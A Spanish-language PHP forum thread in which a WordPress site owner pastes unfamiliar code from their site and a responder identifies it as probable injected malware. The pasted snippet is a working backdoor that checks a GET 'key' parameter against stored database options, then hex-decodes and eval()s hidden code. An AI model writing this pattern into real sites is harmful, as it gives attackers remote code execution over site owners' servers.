PHP - Ayuda, Error

 
Vista:

Ayuda, Error

Publicado por Tier (1 intervención) el 09/01/2024 10:38:32
Buenos días,
Tengo una web de wordpress y me sale esto que no entiendo que es, me han dicho que es de php.
Alguien puede ayudarme?

Gracias de antemano.


?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); }
Valora esta pregunta
Me gusta: Está pregunta es útil y esta claraNo me gusta: Está pregunta no esta clara o no es útil
0
Responder
Imágen de perfil de Ivan

Ayuda, Error

Publicado por Ivan (118 intervenciones) el 10/01/2024 13:39:45
Hola,

El código que has compartido son una serie de instrucciones de PHP, que parecen ser una parte de código que podría ser maliciosa. La función eval se utiliza para ejecutar código PHP dinámicamente y su uso debe manejarse con precaución ya que puede ser un vector de ataque si no se valida y filtra adecuadamente la entrada.

Además, la presencia de funciones como hex2bin y la manipulación de claves y opciones en la base de datos podría indicar que el código está tratando de ejecutar algún tipo de payload oculto.

Aunque no lo puedo asegurar al 100%, el código tiene un aspecto inusual y parece formar parte de un intento de ejecución dinámica de código, utilizado en situaciones de inyección de código malicioso.

Dicho esto, este código no parece ser parte de tu aplicación de WordPress, es posible que hayas sido víctima de un intento de inyección de código malicioso.

Es importante que revises y asegures tu código y tu sitio web.

Un saludo!
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar